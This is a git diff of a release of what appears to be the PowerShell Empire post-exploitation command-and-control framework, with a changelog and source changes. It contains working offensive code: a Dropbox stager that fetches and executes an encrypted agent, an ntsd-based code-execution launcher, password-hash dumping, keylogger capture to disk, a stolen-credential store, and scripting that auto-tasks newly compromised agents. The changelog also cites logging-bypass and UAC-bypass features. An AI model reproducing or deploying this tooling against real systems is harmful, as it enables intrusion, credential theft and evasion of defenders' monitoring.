diff --git a/changelog b/changelog index c59d199..be9d61f 100644 --- a/changelog +++ b/changelog @@ -1,25 +1,26 @@ -Running +10/12/2017 -------- -- Update crontab to work hourly #667 -- Update keylogger to log to disk on server side by @clr2of8 -- Fix macro launcher #681 -- Fixes vbscript string literal quoting. #702 -- Add option to host a stager payload in the http listener @424f424f -- Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f -- Hide true host name when using domain fronting #730 @clr2of8 -- Fixed custom proxy config in launcher code #728 @dirkjanm -- generate_upload function added to Stagers #722 @hightopfade -- Aes kerberoast #725 @elitest -- DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher -- Improved ScriptBlock logging bypasses #740 @cobbr_io -- Slack Integration - Notification for new Agents #737 @dchrastil -- Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers -- Fix Eternal Blue Issue #656 -- Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663 -- Fix Macro syntax error per @utkusen issue #664 -- Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr -- Fix creds manual add parsing with whitespace in password -- Fix validate length parameter attribute for Invoke-PSInject.ps1d +- Version 2.2 Master Release + - Update crontab to work hourly #667 + - Update keylogger to log to disk on server side by @clr2of8 + - Fix macro launcher #681 + - Fixes vbscript string literal quoting. #702 + - Add option to host a stager payload in the http listener @424f424f + - Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f + - Hide true host name when using domain fronting #730 @clr2of8 + - Fixed custom proxy config in launcher code #728 @dirkjanm + - generate_upload function added to Stagers #722 @hightopfade + - Aes kerberoast #725 @elitest + - DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher + - Improved ScriptBlock logging bypasses #740 @cobbr_io + - Slack Integration - Notification for new Agents #737 @dchrastil + - Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers + - Fix Eternal Blue Issue #656 + - Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663 + - Fix Macro syntax error per @utkusen issue #664 + - Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr + - Fix creds manual add parsing with whitespace in password + - Fix validate length parameter attribute for Invoke-PSInject.ps1d 8/28/2017 -------- diff --git a/data/agent/agent.py b/data/agent/agent.py index f34d675..f9acf25 100644 --- a/data/agent/agent.py +++ b/data/agent/agent.py @@ -137,6 +137,9 @@ def build_response_packet(taskingID, packetData, resultID=0): if packetData: packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8',errors='ignore')) + if len(packetData) % 4: + packetData += '=' * (4 - len(packetData) % 4) + length = struct.pack('=L',len(packetData)) return packetType + totalPacket + packetNum + resultID + length + packetData else: diff --git a/data/agent/stagers/dropbox.py b/data/agent/stagers/dropbox.py index cfb8831..b840eeb 100644 --- a/data/agent/stagers/dropbox.py +++ b/data/agent/stagers/dropbox.py @@ -247,11 +247,8 @@ except Exception: return c def append_PKCS7_padding(data): - if (len(data) % 16) == 0: - return data - else: - pad = 16 - (len(data) % 16) - return data + to_bufferable(chr(pad) * pad) + pad = 16 - (len(data) % 16) + return data + to_bufferable(chr(pad) * pad) def strip_PKCS7_padding(data): @@ -259,11 +256,7 @@ def strip_PKCS7_padding(data): raise ValueError("invalid length") pad = _get_byte(data[-1]) - - if pad <= 16: - return data[:-pad] - else: - return data + return data[:-pad] class AES(object): '''Encapsulates the AES block cipher. @@ -522,10 +515,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation): def CBCenc(aesObj, plaintext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary - blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)] - blocks[-1] = append_PKCS7_padding(blocks[-1]) + # First we padd the plaintext + paddedPlaintext = append_PKCS7_padding(plaintext) + + # The we break the padded plaintext in 16 byte chunks + blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)] + # Finally we encypt each block ciphertext = "" for block in blocks: ciphertext += aesObj.encrypt(block) @@ -535,15 +531,16 @@ def CBCenc(aesObj, plaintext, base64=False): def CBCdec(aesObj, ciphertext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary + # First we break the cyphertext in 16 byte chunks blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)] - plaintext = "" + # Then we decrypt each block + paddedPlaintext = "" + for block in blocks: + paddedPlaintext += aesObj.decrypt(block) - for x in xrange(0, len(blocks)-1): - plaintext += aesObj.decrypt(blocks[x]) - - plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1])) + # Finally we strip the padding + plaintext = strip_PKCS7_padding(paddedPlaintext) return plaintext @@ -892,4 +889,4 @@ response = post_message("https://api.dropboxapi.com/2/files/delete",data=datastr # step 6 -> server sends HMAC(AES) agent = aes_decrypt_and_verify(key, raw) -exec(agent) \ No newline at end of file +exec(agent) diff --git a/data/agent/stagers/http.py b/data/agent/stagers/http.py index 0a06c5a..7871fdf 100644 --- a/data/agent/stagers/http.py +++ b/data/agent/stagers/http.py @@ -18,6 +18,8 @@ import socket import subprocess from binascii import hexlify + + LANGUAGE = { 'NONE' : 0, 'POWERSHELL' : 1, @@ -249,13 +251,9 @@ except Exception: def _get_byte(c): return c - def append_PKCS7_padding(data): - if (len(data) % 16) == 0: - return data - else: - pad = 16 - (len(data) % 16) - return data + to_bufferable(chr(pad) * pad) + pad = 16 - (len(data) % 16) + return data + to_bufferable(chr(pad) * pad) def strip_PKCS7_padding(data): @@ -263,11 +261,7 @@ def strip_PKCS7_padding(data): raise ValueError("invalid length") pad = _get_byte(data[-1]) - - if pad <= 16: - return data[:-pad] - else: - return data + return data[:-pad] class AES(object): @@ -335,10 +329,10 @@ class AES(object): tt = tk[KC - 1] tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^ - (self.S[(tt >> 8) & 0xFF] << 16) ^ - (self.S[ tt & 0xFF] << 8) ^ - self.S[(tt >> 24) & 0xFF] ^ - (self.rcon[rconpointer] << 24)) + (self.S[(tt >> 8) & 0xFF] << 16) ^ + (self.S[ tt & 0xFF] << 8) ^ + self.S[(tt >> 24) & 0xFF] ^ + (self.rcon[rconpointer] << 24)) rconpointer += 1 if KC != 8: @@ -352,9 +346,9 @@ class AES(object): tt = tk[KC // 2 - 1] tk[KC // 2] ^= (self.S[ tt & 0xFF] ^ - (self.S[(tt >> 8) & 0xFF] << 8) ^ - (self.S[(tt >> 16) & 0xFF] << 16) ^ - (self.S[(tt >> 24) & 0xFF] << 24)) + (self.S[(tt >> 8) & 0xFF] << 8) ^ + (self.S[(tt >> 16) & 0xFF] << 16) ^ + (self.S[(tt >> 24) & 0xFF] << 24)) for i in xrange(KC // 2 + 1, KC): tk[i] ^= tk[i - 1] @@ -372,9 +366,9 @@ class AES(object): for j in xrange(0, 4): tt = self._Kd[r][j] self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^ - self.U2[(tt >> 16) & 0xFF] ^ - self.U3[(tt >> 8) & 0xFF] ^ - self.U4[ tt & 0xFF]) + self.U2[(tt >> 16) & 0xFF] ^ + self.U3[(tt >> 8) & 0xFF] ^ + self.U4[ tt & 0xFF]) def encrypt(self, plaintext): 'Encrypt a block of plain text using the AES block cipher.' @@ -528,10 +522,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation): def CBCenc(aesObj, plaintext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary - blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)] - blocks[-1] = append_PKCS7_padding(blocks[-1]) + # First we padd the plaintext + paddedPlaintext = append_PKCS7_padding(plaintext) + + # The we break the padded plaintext in 16 byte chunks + blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)] + # Finally we encypt each block ciphertext = "" for block in blocks: ciphertext += aesObj.encrypt(block) @@ -541,15 +538,16 @@ def CBCenc(aesObj, plaintext, base64=False): def CBCdec(aesObj, ciphertext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary + # First we break the cyphertext in 16 byte chunks blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)] - plaintext = "" + # Then we decrypt each block + paddedPlaintext = "" + for block in blocks: + paddedPlaintext += aesObj.decrypt(block) - for x in xrange(0, len(blocks)-1): - plaintext += aesObj.decrypt(blocks[x]) - - plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1])) + # Finally we strip the padding + plaintext = strip_PKCS7_padding(paddedPlaintext) return plaintext diff --git a/data/module_source/code_execution/Invoke-Ntsd.ps1 b/data/module_source/code_execution/Invoke-Ntsd.ps1 new file mode 100644 index 0000000..988347b --- /dev/null +++ b/data/module_source/code_execution/Invoke-Ntsd.ps1 @@ -0,0 +1,8 @@ + +Function Write-Ini([string]$path, [string]$launcher) +{ + # -Encoding ASCII is needed otherwise it will write in unicode + # this will cause ntsd to not execute our code + ".shell" | Out-File -Encoding ASCII "$path\ntsd.ini" + "$launcher" | Out-File -Encoding ASCII "$path\ntsd.ini" -Append +} diff --git a/data/module_source/code_execution/ntsd_x64.exe b/data/module_source/code_execution/ntsd_x64.exe new file mode 100644 index 0000000..e726683 Binary files /dev/null and b/data/module_source/code_execution/ntsd_x64.exe differ diff --git a/data/module_source/code_execution/ntsd_x86.exe b/data/module_source/code_execution/ntsd_x86.exe new file mode 100644 index 0000000..321772f Binary files /dev/null and b/data/module_source/code_execution/ntsd_x86.exe differ diff --git a/data/module_source/code_execution/ntsdexts_x64.dll b/data/module_source/code_execution/ntsdexts_x64.dll new file mode 100644 index 0000000..0432623 Binary files /dev/null and b/data/module_source/code_execution/ntsdexts_x64.dll differ diff --git a/data/module_source/code_execution/ntsdexts_x86.dll b/data/module_source/code_execution/ntsdexts_x86.dll new file mode 100644 index 0000000..b54891d Binary files /dev/null and b/data/module_source/code_execution/ntsdexts_x86.dll differ diff --git a/data/module_source/credentials/Invoke-PowerDump.ps1 b/data/module_source/credentials/Invoke-PowerDump.ps1 index dec03c3..47d9dd7 100644 --- a/data/module_source/credentials/Invoke-PowerDump.ps1 +++ b/data/module_source/credentials/Invoke-PowerDump.ps1 @@ -411,14 +411,30 @@ namespace PowerDump function Get-UserHashes($u, [byte[]]$hbootkey) { [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null; - if ($u.HashOffset + 0x28 -lt $u.V.Length) + + # check if hashes exist (if byte memory equals to 20, then we've got a hash) + $LM_exists = $false; + $NT_exists = $false; + # LM header check + if ($u.V[0xa0..0xa3] -eq 20) + { + $LM_exists = $true; + } + # NT header check + elseif ($u.V[0xac..0xaf] -eq 20) + { + $NT_exists = $true; + } + + if ($LM_exists -eq $true) { $lm_hash_offset = $u.HashOffset + 4; $nt_hash_offset = $u.HashOffset + 8 + 0x10; $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)]; $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; } - elseif ($u.HashOffset + 0x14 -lt $u.V.Length) + + elseif ($NT_exists -eq $true) { $nt_hash_offset = $u.HashOffset + 8; $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; @@ -494,4 +510,4 @@ namespace PowerDump { Write-Error "Administrator or System privileges necessary." } -} \ No newline at end of file +} diff --git a/empire b/empire index 0d7f49a..32cafca 100755 --- a/empire +++ b/empire @@ -10,8 +10,7 @@ from Crypto.Random import random import ssl # Empire imports -from lib.common import empire -from lib.common import helpers +from lib.common import empire, helpers global serverExitCommand serverExitCommand = 'restart' @@ -134,6 +133,7 @@ def get_permanent_token(conn): # GET http://localhost:1337/api/reporting/msg/Z return all logged events matching message Z, wildcards accepted # # GET http://localhost:1337/api/creds return stored credentials +# POST http://localhost:1337/api/creds add creds to the database # # GET http://localhost:1337/api/admin/login retrieve the API token given the correct username and password # GET http://localhost:1337/api/admin/permanenttoken retrieve the permanent API token, generating/storing one if it doesn't already exist @@ -1039,6 +1039,67 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None, return jsonify({'creds' : creds}) + @app.route('/api/creds', methods=['POST']) + def add_creds(): + """ + Adds credentials to the database + """ + if not request.json: + return make_response(jsonify({'error':'request body must be valid JSON'}), 400) + + if not 'credentials' in request.json: + return make_response(jsonify({'error':'JSON body must include key "credentials"'}), 400) + + creds = request.json['credentials'] + + if not type(creds) == list: + return make_response(jsonify({'error':'credentials must be provided as a list'}), 400) + + required_fields = ["credtype", "domain", "username", "password", "host"] + optional_fields = ["OS", "notes", "sid"] + + for cred in creds: + # ensure every credential given to us has all the required fields + if not all (k in cred for k in required_fields): + return make_response(jsonify({'error':'invalid credential %s' %(cred)}), 400) + + # ensure the type is either "hash" or "plaintext" + if not (cred['credtype'] == u'hash' or cred['credtype'] == u'plaintext'): + return make_response(jsonify({'error':'invalid credential type in %s, must be "hash" or "plaintext"' %(cred)}), 400) + + # other than that... just assume everything is valid + + # this would be way faster if batched but will work for now + for cred in creds: + # get the optional stuff, if it's there + try: + os = cred['os'] + except KeyError: + os = '' + + try: + sid = cred['sid'] + except KeyError: + sid = '' + + try: + notes = cred['notes'] + except KeyError: + notes = '' + + main.credentials.add_credential( + cred['credtype'], + cred['domain'], + cred['username'], + cred['password'], + cred['host'], + os, + sid, + notes + ) + + return jsonify({'success': '%s credentials added' % len(creds)}) + @app.route('/api/reporting', methods=['GET']) def get_reporting(): @@ -1161,7 +1222,7 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None, if not os.path.exists('./data/empire-chain.pem'): - print "[!] Error: cannot find certificate ./data/empire.pem" + print "[!] Error: cannot find certificate ./data/empire-chain.pem" sys.exit() @@ -1227,7 +1288,17 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None, # wrap the Flask connection in SSL and start it certPath = os.path.abspath("./data/") - context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + + # support any version of tls + pyversion = sys.version_info + if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: + proto = ssl.PROTOCOL_TLS + elif pyversion[0] >= 3: + proto = ssl.PROTOCOL_TLS + else: + proto = ssl.PROTOCOL_SSLv23 + + context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host='0.0.0.0', port=int(port), ssl_context=context, threaded=True) @@ -1239,6 +1310,7 @@ if __name__ == '__main__': generalGroup = parser.add_argument_group('General Options') generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).') generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.') + generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.') cliGroup = parser.add_argument_group('CLI Payload Options') cliGroup.add_argument('-l', '--listener', nargs='?', const="list", help='Display listener options. Displays all listeners if nothing is specified.') @@ -1267,11 +1339,11 @@ if __name__ == '__main__': # start an Empire instance and RESTful API main = empire.MainMenu(args=args) def thread_api(empireMenu): - while serverExitCommand == 'restart': - try: - start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport) - except SystemExit as e: - pass + + try: + start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport) + except SystemExit as e: + pass thread = helpers.KThread(target=thread_api, args=(main,)) thread.daemon = True @@ -1282,11 +1354,11 @@ if __name__ == '__main__': elif args.headless: # start an Empire instance and RESTful API and suppress output main = empire.MainMenu(args=args) - while serverExitCommand == 'restart': - try: - start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport) - except SystemExit as e: - pass + + try: + start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport) + except SystemExit as e: + pass else: # normal execution diff --git a/lib/common/agents.py b/lib/common/agents.py index 2f9542f..e047629 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1343,6 +1343,20 @@ class Agents: if autorun and autorun[0] != '' and autorun[1] != '': self.add_agent_task_db(sessionID, autorun[0], autorun[1]) + if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0: + autorunCmds = ["interact %s" % sessionID] + autorunCmds.extend(self.mainMenu.autoRuns[language.lower()]) + autorunCmds.extend(["lastautoruncmd"]) + self.mainMenu.resourceQueue.extend(autorunCmds) + try: + #this will cause the cmdloop() to start processing the autoruns + self.mainMenu.do_agents("kickit") + except Exception as e: + if e.message == "endautorun": + pass + else: + raise e + return "STAGE2: %s" % (sessionID) else: @@ -1399,7 +1413,6 @@ class Agents: TODO: does this need self.lock? """ - if sessionID not in self.agents: dispatcher.send("[!] handle_agent_request(): sessionID %s not present" % (sessionID), sender='Agents') return None @@ -1417,6 +1430,7 @@ class Agents: # build tasking packets for everything we have for tasking in taskings: task_name, task_data, res_id = tasking + all_task_packets += packets.build_task_packet(task_name, task_data, res_id) # get the session key for the agent @@ -1495,6 +1509,7 @@ class Agents: """ agentSessionID = sessionID + keyLogTaskID = None # see if we were passed a name instead of an ID nameid = self.get_agent_id_db(sessionID) @@ -1519,6 +1534,10 @@ class Agents: pk = (pk + 1) % 65536 cur.execute("INSERT INTO results (id, agent, data) VALUES (?,?,?)",(pk, sessionID, data)) else: + try: + keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0] + except Exception as e: + pass cur.execute("UPDATE results SET data=data||? WHERE id=? AND agent=?", [data, taskID, sessionID]) finally: @@ -1703,9 +1722,20 @@ class Agents: elif responseName == "TASK_CMD_JOB": + #check if this is the powershell keylogging task, if so, write output to file instead of screen + if keyLogTaskID and keyLogTaskID == taskID: + safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) + savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID) + if not os.path.abspath(savePath).startswith(safePath): + dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') + return + with open(savePath,"a+") as f: + new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") + f.write(new_results) + else: + # dynamic script output -> non-blocking + self.update_agent_results_db(sessionID, data) - # dynamic script output -> non-blocking - self.update_agent_results_db(sessionID, data) # update the agent log self.save_agent_log(sessionID, data) diff --git a/lib/common/empire.py b/lib/common/empire.py index e0a356e..36fa3f7 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -95,12 +95,14 @@ class MainMenu(cmd.Cmd): self.stagers = stagers.Stagers(self, args=args) self.modules = modules.Modules(self, args=args) self.listeners = listeners.Listeners(self, args=args) + self.resourceQueue = [] + #A hashtable of autruns based on agent language + self.autoRuns = {} + self.handle_args() dispatcher.send('[*] Empire starting up...', sender="Empire") - - # print the loading menu messages.loading() @@ -139,6 +141,9 @@ class MainMenu(cmd.Cmd): """ Handle any passed arguments. """ + if self.args.resource: + resourceFile = self.args.resource[0] + self.do_resource(resourceFile) if self.args.listener or self.args.stager: # if we're displaying listeners/stagers or generating a stager @@ -232,11 +237,6 @@ class MainMenu(cmd.Cmd): print helpers.color("[!] Please run database_setup.py") sys.exit() - - # def preloop(self): - # traceback.print_stack() - - def cmdloop(self): """ The main cmdloop logic that handles navigation to other menus. @@ -274,6 +274,9 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n" print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" + if len(self.resourceQueue) > 0: + self.cmdqueue.append(self.resourceQueue.pop(0)) + cmd.Cmd.cmdloop(self) @@ -380,10 +383,43 @@ class MainMenu(cmd.Cmd): # CMD methods ################################################### + def postcmd(self, stop, line): + if len(self.resourceQueue) > 0: + nextcmd = self.resourceQueue.pop(0) + self.cmdqueue.append(nextcmd) + def default(self, line): "Default handler." pass + def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." + self.resourceQueue.extend(self.buildQueue(arg)) + + def buildQueue(self, resourceFile, autoRun=False): + cmds = [] + if os.path.isfile(resourceFile): + with open(resourceFile, 'r') as f: + lines = [] + lines.extend(f.read().splitlines()) + else: + raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile) + for lineFull in lines: + line = lineFull.strip() + #ignore lines that start with the comment symbol (#) + if line.startswith("#"): + continue + #read in another resource file + elif line.startswith("resource "): + rf = line.split(' ')[1] + cmds.extend(self.buildQueue(rf, autoRun)) + #add noprompt option to execute without user confirmation + elif autoRun and line == "execute": + cmds.append(line + " noprompt") + else: + cmds.append(line) + + return cmds def do_exit(self, line): "Exit Empire" @@ -430,7 +466,6 @@ class MainMenu(cmd.Cmd): stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") - except Exception as e: raise e @@ -706,7 +741,6 @@ class MainMenu(cmd.Cmd): name = line.strip() sessionID = self.agents.get_agent_id_db(name) - if sessionID and sessionID != '' and sessionID in self.agents.agents: AgentMenu(self, sessionID) else: @@ -889,26 +923,59 @@ class MainMenu(cmd.Cmd): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in options if s.startswith(mline)] - -class AgentsMenu(cmd.Cmd): - """ - The main class used by Empire to drive the 'agents' menu. - """ +class SubMenu(cmd.Cmd): + def __init__(self, mainMenu): cmd.Cmd.__init__(self) - self.mainMenu = mainMenu - self.doc_header = 'Commands' + def cmdloop(self): + if len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) + cmd.Cmd.cmdloop(self) - # set the prompt text - self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' + def emptyline(self): + pass - messages.display_agents(self.mainMenu.agents.get_agents_db()) - # def preloop(self): - # traceback.print_stack() + def postcmd(self, stop, line): + if line == "back": + return True + if len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + if nextcmd == "lastautoruncmd": + raise Exception("endautorun") + self.cmdqueue.append(nextcmd) + + + def do_back(self, line): + "Go back a menu." + return True + + def do_listeners(self, line): + "Jump to the listeners menu." + raise NavListeners() + + def do_agents(self, line): + "Jump to the agents menu." + raise NavAgents() + + def do_main(self, line): + "Go back to the main menu." + raise NavMain() + + def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." + self.mainMenu.resourceQueue.extend(self.mainMenu.buildQueue(arg)) + + def do_exit(self, line): + "Exit Empire." + raise KeyboardInterrupt + + def do_creds(self, line): + "Display/return credentials from the database." + self.mainMenu.do_creds(line) # print a nicely formatted help menu # stolen/adapted from recon-ng @@ -921,29 +988,63 @@ class AgentsMenu(cmd.Cmd): self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) self.stdout.write("\n") + # def preloop(self): + # traceback.print_stack() - def emptyline(self): - pass +class AgentsMenu(SubMenu): + """ + The main class used by Empire to drive the 'agents' menu. + """ + def __init__(self, mainMenu): + SubMenu.__init__(self, mainMenu) + self.doc_header = 'Commands' + + # set the prompt text + self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' + + messages.display_agents(self.mainMenu.agents.get_agents_db()) def do_back(self, line): "Go back to the main menu." raise NavMain() - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt + def do_autorun(self, line): + "Read and execute a list of Empire commands from a file and execute on each new agent \"autorun \" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" + line = line.strip() + if not line: + print helpers.color("[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'") + return + cmds = line.split(' ') + resourceFile = cmds[0] + language = None + if len(cmds) > 1: + language = cmds[1].lower() + elif not resourceFile == "show" and not resourceFile == "clear": + print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'") + return + #show the current autorun settings by language or all + if resourceFile == "show": + if language: + if self.mainMenu.autoRuns.has_key(language): + print self.mainMenu.autoRuns[language] + else: + print "No autorun commands for language %s" % language + else: + print self.mainMenu.autoRuns + #clear autorun settings by language or all + elif resourceFile == "clear": + if language and not language == "all": + if self.mainMenu.autoRuns.has_key(language): + self.mainMenu.autoRuns.pop(language) + else: + print "No autorun commands for language %s" % language + else: + #clear all autoruns + self.mainMenu.autoRuns.clear() + #read in empire commands from the specified resource file + else: + self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True) def do_list(self, line): @@ -956,7 +1057,6 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.do_list("agents " + str(line)) - def do_rename(self, line): "Rename a particular agent." @@ -1013,12 +1113,6 @@ class AgentsMenu(cmd.Cmd): except KeyboardInterrupt: print '' - - def do_creds(self, line): - "Display/return credentials from the database." - self.mainMenu.do_creds(line) - - def do_clear(self, line): "Clear one or more agent's taskings." @@ -1412,7 +1506,7 @@ class AgentsMenu(cmd.Cmd): return self.mainMenu.complete_creds(text, line, begidx, endidx) -class AgentMenu(cmd.Cmd): +class AgentMenu(SubMenu): """ An abstracted class used by Empire to determine which agent menu type to instantiate. @@ -1421,25 +1515,24 @@ class AgentMenu(cmd.Cmd): agentLanguage = mainMenu.agents.get_language_db(sessionID) - if agentLanguage.lower() == 'powershell': - agent_menu = PowerShellAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - elif agentLanguage.lower() == 'python': - agent_menu = PythonAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - else: - print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) + if agentLanguage.lower() == 'powershell': + agent_menu = PowerShellAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + elif agentLanguage.lower() == 'python': + agent_menu = PythonAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + else: + print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) -class PowerShellAgentMenu(cmd.Cmd): +class PowerShellAgentMenu(SubMenu): """ The main class used by Empire to drive an individual 'agent' menu. """ def __init__(self, mainMenu, sessionID): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) - self.mainMenu = mainMenu self.sessionID = sessionID self.doc_header = 'Agent Commands' @@ -1461,7 +1554,6 @@ class PowerShellAgentMenu(cmd.Cmd): # listen for messages from this specific agent dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any) - # def preloop(self): # traceback.print_stack() @@ -1469,49 +1561,22 @@ class PowerShellAgentMenu(cmd.Cmd): """ Handle agent event signals. """ + if '[!] Agent' in signal and 'exiting' in signal: pass name = self.mainMenu.agents.get_agent_name_db(self.sessionID) - if (str(self.sessionID) + " returned results" in signal) or (str(name) + " returned results" in signal): # display any results returned by this agent that are returned - # while we are interacting with it + # while we are interacting with it, unless they are from the powershell keylogger results = self.mainMenu.agents.get_agent_results_db(self.sessionID) - if results: - if sender == "AgentsPsKeyLogger" and ("Job started:" not in results) and ("killed." not in results): - safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) - savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,self.sessionID) - if not os.path.abspath(savePath).startswith(safePath): - dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') - return - with open(savePath,"a+") as f: - new_results = results.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") - f.write(new_results) - else: - print "\n" + results + if results and not sender == "AgentsPsKeyLogger": + print "\n" + results elif "[+] Part of file" in signal and "saved" in signal: if (str(self.sessionID) in signal) or (str(name) in signal): print helpers.color(signal) - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def default(self, line): "Default handler" @@ -1531,27 +1596,6 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Command not recognized.") print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.") - - def do_back(self, line): - "Go back a menu." - return True - - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_help(self, *args): "Displays the help menu or syntax for particular commands." @@ -1559,8 +1603,7 @@ class PowerShellAgentMenu(cmd.Cmd): print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n") print " " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10, indent=5) + "\n" else: - cmd.Cmd.do_help(self, *args) - + SubMenu.do_help(self, *args) def do_list(self, line): "Lists all active agents (or listeners)." @@ -1572,7 +1615,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please use 'list [agents/listeners] '.") - def do_rename(self, line): "Rename the agent." @@ -1588,7 +1630,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please enter a new name for the agent") - def do_info(self, line): "Display information about this agent" @@ -1596,7 +1637,6 @@ class PowerShellAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) - def do_exit(self, line): "Task agent to exit." @@ -1709,7 +1749,6 @@ class PowerShellAgentMenu(cmd.Cmd): 